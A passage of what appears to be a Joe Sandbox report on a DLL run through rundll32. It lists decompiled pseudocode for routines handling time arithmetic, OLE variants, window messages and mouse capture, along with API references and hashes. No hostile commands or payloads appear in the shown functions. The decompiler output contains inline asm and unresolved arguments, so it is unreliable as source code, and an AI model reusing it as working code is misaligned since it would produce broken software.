									_v12 = _v12 + 0xffffffc4;
									asm("adc dword [ebp-0x4], 0xffffffff");
								}
								_t69 = E10013780(_v12, _v8, 0x3c, 0);
								asm("cdq");
								asm("adc edi, edx");
								_v12 = _t69 +  *((intOrPtr*)(_t129 + 4));
								_v8 = _t118;
								_t71 = E10019490(_t69 +  *((intOrPtr*)(_t129 + 4)), _t118, 0x3c, 0);
								__eflags = _t71;
								 *((intOrPtr*)(_t129 + 4)) = _t71;
								if(_t71 < 0) {
									 *((intOrPtr*)(_t129 + 4)) = _t71 + 0x3c;
									_v12 = _v12 + 0xffffffc4;
									asm("adc dword [ebp-0x4], 0xffffffff");
								}
								_t72 = E10013780(_v12, _v8, 0x3c, 0);
								asm("cdq");
								asm("adc edi, edx");
								_v12 = _t72 +  *((intOrPtr*)(_t129 + 8));
								_v8 = _t118;
								_t74 = E10019490(_t72 +  *((intOrPtr*)(_t129 + 8)), _t118, 0x18, 0);
								__eflags = _t74;
								 *((intOrPtr*)(_t129 + 8)) = _t74;
								if(_t74 < 0) {
									 *((intOrPtr*)(_t129 + 8)) = _t74 + 0x18;
									_v12 = _v12 + 0xffffffe8;
									asm("adc dword [ebp-0x4], 0xffffffff");
								}
								_t75 = E10013780(_v12, _v8, 0x18, 0);
								__eflags = _t118;
								_v12 = _t75;
								_v8 = _t118;
								if(__eflags > 0) {
									goto L28;
								} else {
									if(__eflags < 0) {
										L25:
										asm("cdq");
										_t111 = 7;
										 *(_t129 + 0x18) = ( *(_t129 + 0x18) + _t75 + 7) % _t111;
										 *((intOrPtr*)(_t129 + 0xc)) =  *((intOrPtr*)(_t129 + 0xc)) + _v12;
										_t79 =  *((intOrPtr*)(_t129 + 0xc));
										__eflags = _t79;
										if(_t79 > 0) {
											_t60 = _t129 + 0x1c;
											 *_t60 =  *((intOrPtr*)(_t129 + 0x1c)) + _v12;
											__eflags =  *_t60;
										} else {
											 *((intOrPtr*)(_t129 + 0x14)) =  *((intOrPtr*)(_t129 + 0x14)) - 1;
											 *((intOrPtr*)(_t129 + 0xc)) = _t79 + 0x1f;
											 *((intOrPtr*)(_t129 + 0x1c)) = 0x16c;
											 *((intOrPtr*)(_t129 + 0x10)) = 0xb;
										}
										goto L28;
									}
									__eflags = _t75;
									if(_t75 >= 0) {
										goto L28;
									}
									goto L25;
								}
							}
							_push(_t129);
							_t85 = E10019447(0, _t121, _t129, __eflags);
							__eflags = _t85;
							if(_t85 == 0) {
								goto L15;
							}
							_t113 =  *0x1004cdf0; // 0xfffff1f0
							_t86 =  *0x1004cde8; // 0x7080
							asm("cdq");
							asm("cdq");
							asm("sbb edx, edi");
							_v12 =  *_t129 - _t86 + _t113;
							_v8 = _t118;
							 *((intOrPtr*)(_t129 + 0x20)) = 1;
							_t123 = _v8;
							_t105 = _v12;
							goto L16;
						} else {
							_t90 =  *0x1004cde8; // 0x7080
							asm("cdq");
							asm("sbb ecx, edx");
							_v12 = _t128 - _t90;
							_v8 = _t102;
							_t92 = E10018BEF( &_v12);
							_t138 =  *0x1004cdec; // 0x1
							_t129 = _t92;
							if(_t138 != 0) {
								_push(_t129);
								if(E10019447(0, _t121, _t129, _t138) != 0) {
									_t94 =  *0x1004cdf0; // 0xfffff1f0
									asm("cdq");
									_v12 = _v12 - _t94;
									asm("sbb [ebp-0x4], edx");
									_t129 = E10018BEF( &_v12);
									 *((intOrPtr*)(_t129 + 0x20)) = 1;
								}
							}
							L28:
							_t63 = _t129;
							L30:
							return _t63;
						}
					}
					_t135 = _t62;
					if(_t62 > 0) {
						goto L29;
					}
					goto L6;
				}
			}







































                                                                                                            0x100134e7
                                                                                                            0x100134ee
                                                                                                            0x100134f1
                                                                                                            0x100134f4
                                                                                                            0x100134f8
                                                                                                            0x100134fa
                                                                                                            0x100136ef
                                                                                                            0x100136ef
                                                                                                            0x100136ef
                                                                                                            0x00000000
                                                                                                            0x1001350a
                                                                                                            0x1001350a
                                                                                                            0x10013510
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10013516
                                                                                                            0x10013520
                                                                                                            0x10013520
                                                                                                            0x10013521
                                                                                                            0x10013526
                                                                                                            0x10013529
                                                                                                            0x1001352b
                                                                                                            0x1001352d
                                                                                                            0x10013595
                                                                                                            0x1001359a
                                                                                                            0x100135a1
                                                                                                            0x100135a3
                                                                                                            0x100135de
                                                                                                            0x100135e0
                                                                                                            0x100135e3
                                                                                                            0x100135e8
                                                                                                            0x100135ea
                                                                                                            0x100135eb
                                                                                                            0x100135eb
                                                                                                            0x100135ed
                                                                                                            0x100135ef
                                                                                                            0x100135f2
                                                                                                            0x100135f5
                                                                                                            0x100135fa
                                                                                                            0x100135ff
                                                                                                            0x10013601
                                                                                                            0x10013603
                                                                                                            0x10013608
                                                                                                            0x1001360a
                                                                                                            0x1001360e
                                                                                                            0x1001360e
                                                                                                            0x1001361b
                                                                                                            0x10013627
                                                                                                            0x1001362b
                                                                                                            0x10013631
                                                                                                            0x10013634
                                                                                                            0x10013637
                                                                                                            0x1001363c
                                                                                                            0x1001363e
                                                                                                            0x10013641
                                                                                                            0x10013646
                                                                                                            0x10013649
                                                                                                            0x1001364d
                                                                                                            0x1001364d
                                                                                                            0x1001365a
                                                                                                            0x10013666
                                                                                                            0x1001366a
                                                                                                            0x10013670
                                                                                                            0x10013673
                                                                                                            0x10013676
                                                                                                            0x1001367b
                                                                                                            0x1001367d
                                                                                                            0x10013680
                                                                                                            0x10013685
                                                                                                            0x10013688
                                                                                                            0x1001368c
                                                                                                            0x1001368c
                                                                                                            0x10013699
                                                                                                            0x1001369e
                                                                                                            0x100136a0
                                                                                                            0x100136a3
                                                                                                            0x100136a6
                                                                                                            0x00000000
                                                                                                            0x100136a8
                                                                                                            0x100136a8
                                                                                                            0x100136ae
                                                                                                            0x100136b5
                                                                                                            0x100136b8
                                                                                                            0x100136bb
                                                                                                            0x100136c1
                                                                                                            0x100136c4
                                                                                                            0x100136c7
                                                                                                            0x100136c9
                                                                                                            0x100136e7
                                                                                                            0x100136e7
                                                                                                            0x100136e7
                                                                                                            0x100136cb
                                                                                                            0x100136ce
                                                                                                            0x100136d1
                                                                                                            0x100136d4
                                                                                                            0x100136db
                                                                                                            0x100136db
                                                                                                            0x00000000
                                                                                                            0x100136c9
                                                                                                            0x100136aa
                                                                                                            0x100136ac
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100136ac
                                                                                                            0x100136a6
                                                                                                            0x100135a5
                                                                                                            0x100135a6
                                                                                                            0x100135ab
                                                                                                            0x100135ae
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100135b0
                                                                                                            0x100135b6
                                                                                                            0x100135bd
                                                                                                            0x100135c4
                                                                                                            0x100135c7
                                                                                                            0x100135c9
                                                                                                            0x100135cc
                                                                                                            0x100135cf
                                                                                                            0x100135d6
                                                                                                            0x100135d9
                                                                                                            0x00000000
                                                                                                            0x10013539
                                                                                                            0x10013539
                                                                                                            0x1001353e
                                                                                                            0x10013544
                                                                                                            0x10013547
                                                                                                            0x1001354a
                                                                                                            0x1001354d
                                                                                                            0x10013552
                                                                                                            0x10013559
                                                                                                            0x1001355b
                                                                                                            0x10013561
                                                                                                            0x1001356a
                                                                                                            0x10013570
                                                                                                            0x10013575
                                                                                                            0x10013576
                                                                                                            0x1001357d
                                                                                                            0x10013585
                                                                                                            0x10013588
                                                                                                            0x10013588
                                                                                                            0x1001356a
                                                                                                            0x100136ea
                                                                                                            0x100136ea
                                                                                                            0x100136f1
                                                                                                            0x100136f4
                                                                                                            0x100136f4
                                                                                                            0x1001352d
                                                                                                            0x10013518
                                                                                                            0x1001351a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001351a

                                                                                                            APIs
                                                                                                              • Part of subcall function 10018BEF: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10018C61
                                                                                                            • __allrem.LIBCMT ref: 100135FA
                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 1001361B
                                                                                                            • __allrem.LIBCMT ref: 10013637
                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 1001365A
                                                                                                            • __allrem.LIBCMT ref: 10013676
                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10013699
                                                                                                              • Part of subcall function 10019447: __lock.LIBCMT ref: 10019455
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$__allrem$__lock
                                                                                                            • String ID:
                                                                                                            • API String ID: 1282128132-0
                                                                                                            • Opcode ID: 79635a6e1b24faedbdc9e56547a81b4bda77f7f01b1a66432270eb392f53d183
                                                                                                            • Instruction ID: c60af2d58918d4078ab001666915cbd37c2ef6b2e54b6b359c888c98dc157d7e
                                                                                                            • Opcode Fuzzy Hash: 79635a6e1b24faedbdc9e56547a81b4bda77f7f01b1a66432270eb392f53d183
                                                                                                            • Instruction Fuzzy Hash: CC616DB5A00605EFDB64CF68C88199EBBF5EB44324B21C57EE055EB391E730EE859B40
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1000F210 Relevance: 9.1, APIs: 6, Instructions: 137COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 41%
                                                                                                            			E1000F210(void* __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t73;
				intOrPtr _t85;
				intOrPtr* _t89;
				intOrPtr* _t92;
				intOrPtr* _t94;
				void* _t99;
				intOrPtr _t109;
				intOrPtr _t110;
				intOrPtr _t122;
				void* _t124;
				void* _t126;
				void* _t128;
				void* _t129;

				_t117 = __edx;
				E10011BF0(0x1003b066, _t126);
				_t129 = _t128 - 0x6c;
				_t73 = 0;
				_t124 = __ecx;
				 *((intOrPtr*)(__ecx + 0x44)) = 1;
				 *(_t126 - 0x10) = 0;
				 *(_t126 - 0x18) = 0;
				if( *((intOrPtr*)(__ecx + 0x10)) <= 0) {
					L21:
					 *(_t124 + 0x44) =  *(_t124 + 0x44) & 0x00000000;
					 *[fs:0x0] =  *((intOrPtr*)(_t126 - 0xc));
					return 0;
				}
				do {
					_t104 = _t73 + _t73 * 4 << 3;
					_t109 =  *((intOrPtr*)( *((intOrPtr*)(_t124 + 0x14)) + (_t73 + _t73 * 4 << 3) + 0x24));
					if(_t109 == 0) {
						goto L19;
					}
					_t110 =  *((intOrPtr*)(_t109 + 4));
					 *((intOrPtr*)(_t126 - 0x20)) = _t110;
					if(_t110 == 0) {
						goto L19;
					}
					 *(_t126 - 0x14) =  *(_t126 - 0x10) << 4;
					do {
						_t122 =  *((intOrPtr*)(E10006D96(_t126 - 0x20)));
						 *((intOrPtr*)(_t126 - 0x24)) = 0xfffffffd;
						E10011C50(_t126 - 0x78, 0, 0x20);
						_t129 = _t129 + 0xc;
						E10010592(_t126 - 0x48);
						 *(_t126 - 4) =  *(_t126 - 4) & 0x00000000;
						_t135 =  *((intOrPtr*)(_t124 + 0x48));
						if( *((intOrPtr*)(_t124 + 0x48)) == 0) {
							_t85 =  *((intOrPtr*)(_t124 + 0x40)) +  *(_t126 - 0x14);
							__eflags = _t85;
						} else {
							_t99 = E1000ECE8(_t104, _t124, _t117, _t122, _t124, _t135, _t126 - 0x58,  *(_t126 - 0x18) + 1);
							 *(_t126 - 4) = 1;
							E10010578(_t99, _t126 - 0x48, _t99);
							 *(_t126 - 4) = 0;
							__imp__#9(_t126 - 0x58);
							_t85 = _t126 - 0x48;
						}
						 *((intOrPtr*)(_t126 - 0x38)) = _t85;
						 *((intOrPtr*)(_t126 - 0x34)) = _t126 - 0x24;
						 *((intOrPtr*)(_t126 - 0x30)) = 1;
						 *((intOrPtr*)(_t126 - 0x2c)) = 1;
						 *(_t122 + 0x84) = 1;
						_t89 =  *((intOrPtr*)(_t122 + 0x4c));
						if(_t89 != 0) {
							_t117 = _t126 - 0x1c;
							_push(_t126 - 0x1c);
							_push(0x10043098);
							_push(_t89);
							if( *((intOrPtr*)( *_t89))() >= 0) {
								_t92 =  *((intOrPtr*)(_t126 - 0x1c));
								_t117 = _t126 - 0x38;
								 *((intOrPtr*)( *_t92 + 0x18))(_t92,  *((intOrPtr*)(_t122 + 0x98)), 0x10043018, 0, 4, _t126 - 0x38, 0, _t126 - 0x78, _t126 - 0x28);
								_t94 =  *((intOrPtr*)(_t126 - 0x1c));
								 *((intOrPtr*)( *_t94 + 8))(_t94);
								 *(_t122 + 0x84) =  *(_t122 + 0x84) & 0x00000000;
								if( *((intOrPtr*)(_t126 - 0x74)) != 0) {
									__imp__#6( *((intOrPtr*)(_t126 - 0x74)));
								}
								if( *((intOrPtr*)(_t126 - 0x70)) != 0) {
									__imp__#6( *((intOrPtr*)(_t126 - 0x70)));
								}
								if( *((intOrPtr*)(_t126 - 0x6c)) != 0) {
									__imp__#6( *((intOrPtr*)(_t126 - 0x6c)));
								}
								 *(_t126 - 0x10) =  *(_t126 - 0x10) + 1;
								 *(_t126 - 0x14) =  *(_t126 - 0x14) + 0x10;
							}
						}
						 *(_t126 - 4) =  *(_t126 - 4) | 0xffffffff;
						__imp__#9(_t126 - 0x48);
					} while ( *((intOrPtr*)(_t126 - 0x20)) != 0);
					_t73 =  *(_t126 - 0x18);
					L19:
					_t73 = _t73 + 1;
					 *(_t126 - 0x18) = _t73;
				} while (_t73 <  *((intOrPtr*)(_t124 + 0x10)));
				goto L21;
			}



















                                                                                                            0x1000f210
                                                                                                            0x1000f215
                                                                                                            0x1000f21a
                                                                                                            0x1000f21d
                                                                                                            0x1000f220
                                                                                                            0x1000f225
                                                                                                            0x1000f22c
                                                                                                            0x1000f22f
                                                                                                            0x1000f232
                                                                                                            0x1000f39d
                                                                                                            0x1000f39d
                                                                                                            0x1000f3a7
                                                                                                            0x1000f3af
                                                                                                            0x1000f3af
                                                                                                            0x1000f23a
                                                                                                            0x1000f240
                                                                                                            0x1000f243
                                                                                                            0x1000f249
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000f24f
                                                                                                            0x1000f254
                                                                                                            0x1000f257
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000f263
                                                                                                            0x1000f266
                                                                                                            0x1000f276
                                                                                                            0x1000f280
                                                                                                            0x1000f287
                                                                                                            0x1000f28c
                                                                                                            0x1000f293
                                                                                                            0x1000f298
                                                                                                            0x1000f29c
                                                                                                            0x1000f2a0
                                                                                                            0x1000f2d5
                                                                                                            0x1000f2d5
                                                                                                            0x1000f2a2
                                                                                                            0x1000f2ad
                                                                                                            0x1000f2b6
                                                                                                            0x1000f2ba
                                                                                                            0x1000f2c3
                                                                                                            0x1000f2c7
                                                                                                            0x1000f2cd
                                                                                                            0x1000f2cd
                                                                                                            0x1000f2d8
                                                                                                            0x1000f2de
                                                                                                            0x1000f2e4
                                                                                                            0x1000f2e7
                                                                                                            0x1000f2ea
                                                                                                            0x1000f2f0
                                                                                                            0x1000f2f5
                                                                                                            0x1000f2f9
                                                                                                            0x1000f2fc
                                                                                                            0x1000f2fd
                                                                                                            0x1000f302
                                                                                                            0x1000f307
                                                                                                            0x1000f309
                                                                                                            0x1000f318
                                                                                                            0x1000f32c
                                                                                                            0x1000f32f
                                                                                                            0x1000f335
                                                                                                            0x1000f338
                                                                                                            0x1000f343
                                                                                                            0x1000f348
                                                                                                            0x1000f348
                                                                                                            0x1000f352
                                                                                                            0x1000f357
                                                                                                            0x1000f357
                                                                                                            0x1000f361
                                                                                                            0x1000f366
                                                                                                            0x1000f366
                                                                                                            0x1000f36c
                                                                                                            0x1000f36f
                                                                                                            0x1000f36f
                                                                                                            0x1000f307
                                                                                                            0x1000f373
                                                                                                            0x1000f37b
                                                                                                            0x1000f381
                                                                                                            0x1000f38b
                                                                                                            0x1000f38e
                                                                                                            0x1000f38e
                                                                                                            0x1000f392
                                                                                                            0x1000f392
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 1000F215
                                                                                                            • VariantClear.OLEAUT32(?), ref: 1000F2C7
                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 1000F348
                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 1000F357
                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 1000F366
                                                                                                            • VariantClear.OLEAUT32(00000000), ref: 1000F37B
                                                                                                              • Part of subcall function 1000ECE8: __EH_prolog.LIBCMT ref: 1000ECED
                                                                                                              • Part of subcall function 1000ECE8: VariantClear.OLEAUT32(?), ref: 1000ED4F
                                                                                                              • Part of subcall function 10010578: VariantCopy.OLEAUT32(?,?), ref: 10010580
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Variant$ClearFreeString$H_prolog$Copy
                                                                                                            • String ID:
                                                                                                            • API String ID: 3098219910-0
                                                                                                            • Opcode ID: bf17ac4818e0564067b8238a0aa3a1f993aac9d9eae25163256e1dd43de28d52
                                                                                                            • Instruction ID: 75c5e2025475ce32d6cb8a8ad57bceb5efa69f1f793163f183f6db466388bc1f
                                                                                                            • Opcode Fuzzy Hash: bf17ac4818e0564067b8238a0aa3a1f993aac9d9eae25163256e1dd43de28d52
                                                                                                            • Instruction Fuzzy Hash: 455117B1900209AFEB14CFA4C884BEEBBB9FF08355F104529E116EB655D774AA45CB60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1002B9F8 Relevance: 9.1, APIs: 6, Instructions: 122windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 61%
                                                                                                            			E1002B9F8(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				char _v17;
				char _v18;
				signed int _v19;
				char _v28;
				long _v32;
				signed int _v36;
				char _v52;
				intOrPtr _t41;
				intOrPtr* _t44;
				signed char _t63;
				intOrPtr* _t85;
				intOrPtr* _t88;

				_t41 =  *0x1004c470; // 0x6edecb8c
				_t88 = __ecx;
				_push( &_v28);
				_push(_a4);
				_v8 = _t41;
				_push(0x417);
				 *((intOrPtr*)( *__ecx + 0x110))();
				_t44 = _a8;
				 *(_t44 + 8) =  *(_t44 + 8) ^ 0x00000004;
				_v18 = 0;
				_v17 = 0;
				 *((char*)(_t44 + 0xa)) = 0;
				 *((char*)(_t44 + 0xb)) = 0;
				if(E10011FB0(_t44,  &_v28, 0x14) != 0) {
					_v36 = E100202AB(_t88);
					E100202DF(_t88, 0x10000000, 0, 0);
					 *((intOrPtr*)( *_t88 + 0x110))(0x416, _a4, 0, __edi);
					_v32 = SendMessageA( *(_t88 + 0x1c), 0x43d, 0, 0);
					SendMessageA( *(_t88 + 0x1c), 0xb, 0, 0);
					SendMessageA( *(_t88 + 0x1c), 0x43c, _v32 + 1, 0);
					SendMessageA( *(_t88 + 0x1c), 0x43c, _v32, 0);
					SendMessageA( *(_t88 + 0x1c), 0xb, 1, 0);
					_t85 = _a8;
					 *((intOrPtr*)( *_t88 + 0x110))(0x415, _a4, _t85);
					E100202DF(_t88, 0, _v36 & 0x10000000, 0);
					_t63 =  *((intOrPtr*)(_t85 + 9));
					if(((_t63 ^ _v19) & 0x00000001) != 0 || (_t63 & 0x00000001) != 0 &&  *_t85 != _v28) {
						_push(1);
						_push(0);
						goto L7;
					} else {
						_push( &_v52);
						_push(_a4);
						_push(0x41d);
						if( *((intOrPtr*)( *_t88 + 0x110))() != 0) {
							_push(1);
							_push( &_v52);
							L7:
							_t45 = InvalidateRect( *(_t88 + 0x1c), ??, ??);
						}
					}
				}
				return E100117AE(_t45, _v8);
			}
















                                                                                                            0x1002b9fe
                                                                                                            0x1002ba05
                                                                                                            0x1002ba0a
                                                                                                            0x1002ba0b
                                                                                                            0x1002ba0e
                                                                                                            0x1002ba13
                                                                                                            0x1002ba1a
                                                                                                            0x1002ba20
                                                                                                            0x1002ba23
                                                                                                            0x1002ba30
                                                                                                            0x1002ba33
                                                                                                            0x1002ba36
                                                                                                            0x1002ba39
                                                                                                            0x1002ba46
                                                                                                            0x1002ba5d
                                                                                                            0x1002ba60
                                                                                                            0x1002ba72
                                                                                                            0x1002ba91
                                                                                                            0x1002ba94
                                                                                                            0x1002baa4
                                                                                                            0x1002bab2
                                                                                                            0x1002babc
                                                                                                            0x1002babe
                                                                                                            0x1002bace
                                                                                                            0x1002bae1
                                                                                                            0x1002bae6
                                                                                                            0x1002baf1
                                                                                                            0x1002bb20
                                                                                                            0x1002bb22
                                                                                                            0x00000000
                                                                                                            0x1002bafe
                                                                                                            0x1002bb03
                                                                                                            0x1002bb04
                                                                                                            0x1002bb09
                                                                                                            0x1002bb16
                                                                                                            0x1002bb18
                                                                                                            0x1002bb1d
                                                                                                            0x1002bb23
                                                                                                            0x1002bb26
                                                                                                            0x1002bb26
                                                                                                            0x1002bb16
                                                                                                            0x1002bb2c
                                                                                                            0x1002bb38

                                                                                                            APIs
                                                                                                              • Part of subcall function 100202AB: GetWindowLongA.USER32 ref: 100202B6
                                                                                                            • SendMessageA.USER32(?,0000043D,00000000,00000000), ref: 1002BA88
                                                                                                            • SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 1002BA94
                                                                                                            • SendMessageA.USER32(?,0000043C,?,00000000), ref: 1002BAA4
                                                                                                            • SendMessageA.USER32(?,0000043C,?,00000000), ref: 1002BAB2
                                                                                                            • SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 1002BABC
                                                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 1002BB26
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$InvalidateLongRectWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 74886174-0
                                                                                                            • Opcode ID: b589b2aa5c9a58cfbe72108c5627e30e0f5fe5e27cf1599c4597c7e22d4c9a41
                                                                                                            • Instruction ID: d3f4ff1b3068862bce3741e6c92e476afb765aaf48ff9a7e93f31cae0c4b6ca1
                                                                                                            • Opcode Fuzzy Hash: b589b2aa5c9a58cfbe72108c5627e30e0f5fe5e27cf1599c4597c7e22d4c9a41
                                                                                                            • Instruction Fuzzy Hash: D0416CB0600248BFEB11DB94DC95EFEBBB9EF48744F414459FA41AB291C6B0AD45CB60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10030A77 Relevance: 9.1, APIs: 6, Instructions: 101windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 77%
                                                                                                            			E10030A77(void* __ecx, intOrPtr __edx) {
				intOrPtr _v8;
				struct tagMSG _v32;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t30;
				void* _t32;
				void* _t34;
				void* _t36;
				intOrPtr* _t37;
				void* _t41;
				intOrPtr _t55;
				void* _t56;
				void* _t57;
				void* _t60;
				void* _t61;
				intOrPtr* _t62;

				_t58 = __edx;
				_t60 = __ecx;
				if(GetCapture() != 0) {
					L20:
					return 0;
				}
				E100220EE(_t61, SetCapture( *( *((intOrPtr*)(_t60 + 0x68)) + 0x1c)));
				if(E100220EE(_t61, GetCapture()) !=  *((intOrPtr*)(_t60 + 0x68))) {
					L19:
					E100308EB(_t60, _t72);
					goto L20;
				} else {
					while(GetMessageA( &_v32, 0, 0, 0) != 0) {
						_t30 = _v32.message - 0x100;
						if(_t30 == 0) {
							__eflags =  *((intOrPtr*)(_t60 + 0x88));
							if( *((intOrPtr*)(_t60 + 0x88)) != 0) {
								E1003075A(_t60, _v32.wParam, 1);
							}
							__eflags = _v32.wParam - 0x1b;
							if(__eflags != 0) {
								L18:
								_t32 = E100220EE(_t61, GetCapture());
								_t72 = _t32 -  *((intOrPtr*)(_t60 + 0x68));
								if(_t32 ==  *((intOrPtr*)(_t60 + 0x68))) {
									continue;
								}
							}
							goto L19;
						}
						_t34 = _t30 - 1;
						if(_t34 == 0) {
							__eflags =  *((intOrPtr*)(_t60 + 0x88));
							if(__eflags != 0) {
								E1003075A(_t60, _v32.wParam, 0);
							}
							goto L18;
						}
						_t36 = _t34 - 0xff;
						if(_t36 == 0) {
							_t55 = _v32.pt;
							_t58 = _v8;
							__eflags =  *((intOrPtr*)(_t60 + 0x88));
							_push(_t55);
							_push(_t55);
							_t37 = _t62;
							 *_t37 = _t55;
							 *((intOrPtr*)(_t37 + 4)) = _v8;
							_t56 = _t60;
							if( *((intOrPtr*)(_t60 + 0x88)) == 0) {
								E1003078E(_t56, 0);
							} else {
								E100306DB(_t56);
							}
							goto L18;
						}
						_t41 = _t36;
						if(_t41 == 0) {
							__eflags =  *((intOrPtr*)(_t60 + 0x88));
							_t57 = _t60;
							if(__eflags == 0) {
								E10030A33(_t61, __eflags);
							} else {
								E10030930(_t57, _t58, 0, _t60, __eflags);
							}
							return 1;
						}
						if(_t41 == 0) {
							goto L19;
						}
						DispatchMessageA( &_v32);
						goto L18;
					}
					_push(_v32.wParam);
					E1003A098();
					goto L19;
				}
			}




















                                                                                                            0x10030a77
                                                                                                            0x10030a86
                                                                                                            0x10030a8c
                                                                                                            0x10030b66
                                                                                                            0x00000000
                                                                                                            0x10030b66
                                                                                                            0x10030a9f
                                                                                                            0x10030aaf
                                                                                                            0x10030b5f
                                                                                                            0x10030b61
                                                                                                            0x00000000
                                                                                                            0x10030ab5
                                                                                                            0x10030ab7
                                                                                                            0x10030acf
                                                                                                            0x10030ad4
                                                                                                            0x10030b34
                                                                                                            0x10030b3a
                                                                                                            0x10030b43
                                                                                                            0x10030b43
                                                                                                            0x10030b48
                                                                                                            0x10030b4c
                                                                                                            0x10030b4e
                                                                                                            0x10030b51
                                                                                                            0x10030b56
                                                                                                            0x10030b59
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10030b59
                                                                                                            0x00000000
                                                                                                            0x10030b4c
                                                                                                            0x10030ad6
                                                                                                            0x10030ad7
                                                                                                            0x10030b1f
                                                                                                            0x10030b25
                                                                                                            0x10030b2d
                                                                                                            0x10030b2d
                                                                                                            0x00000000
                                                                                                            0x10030b25
                                                                                                            0x10030ad9
                                                                                                            0x10030ade
                                                                                                            0x10030af8
                                                                                                            0x10030afb
                                                                                                            0x10030afe
                                                                                                            0x10030b04
                                                                                                            0x10030b05
                                                                                                            0x10030b06
                                                                                                            0x10030b08
                                                                                                            0x10030b0a
                                                                                                            0x10030b0d
                                                                                                            0x10030b0f
                                                                                                            0x10030b18
                                                                                                            0x10030b11
                                                                                                            0x10030b11
                                                                                                            0x10030b11
                                                                                                            0x00000000
                                                                                                            0x10030b0f
                                                                                                            0x10030ae1
                                                                                                            0x10030ae2
                                                                                                            0x10030b77
                                                                                                            0x10030b7d
                                                                                                            0x10030b7f
                                                                                                            0x10030b88
                                                                                                            0x10030b81
                                                                                                            0x10030b81
                                                                                                            0x10030b81
                                                                                                            0x00000000
                                                                                                            0x10030b8f
                                                                                                            0x10030aea
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10030af0
                                                                                                            0x00000000
                                                                                                            0x10030af0
                                                                                                            0x10030b6d
